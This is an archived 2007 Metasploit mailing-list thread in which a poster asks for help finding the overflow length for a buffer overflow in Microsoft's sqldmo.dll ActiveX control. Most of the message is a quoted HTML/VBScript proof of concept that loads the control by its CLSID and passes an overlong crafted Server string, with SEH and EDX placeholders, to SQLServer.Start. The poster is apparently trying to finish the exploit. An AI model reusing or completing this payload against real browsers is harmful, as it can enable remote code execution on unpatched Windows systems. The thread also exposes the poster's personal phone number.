Metasploit mailing list archives
Microsoft SQL Server Distributed Management Objects OLE DLL for
From: manish.gupta at ariosesoftware.com (Manish Gupta)
Date: Fri, 14 Sep 2007 09:11:53 +0530
Hi

I want to know the server string length of Microsoft SQL Server Distributed Management Objects OLE DLL which has been published on 7th of Sept. 2007.

Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667

_____

From: Manish Gupta [mailto:manish.gupta at ariosesoftware.com]
Sent: Thursday, September 13, 2007 6:05 PM
To: framework at metasploit.com
Subject: [framework] Microsoft SQL Server Distributed Management Objects OLE DLL for

Hi

Am working on "Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" on this vulnerability whose exploit is

<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )"
memberName = "Start"
progid = "SQLDMO.SQLServer"
argCount = 4
'edx = ecx
edx ="bb"
seh ="aa"
StartMode =True
Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\ \\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\ test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:# $%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login ="aaaaaaaa"
Password ="bbbbbbbb"
SQLServer.Start StartMode ,Server ,Login ,Password
</script>
</html>

I am not able to find the server length so please help me.
Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\ \\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\ test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:# $%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\" \\

Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667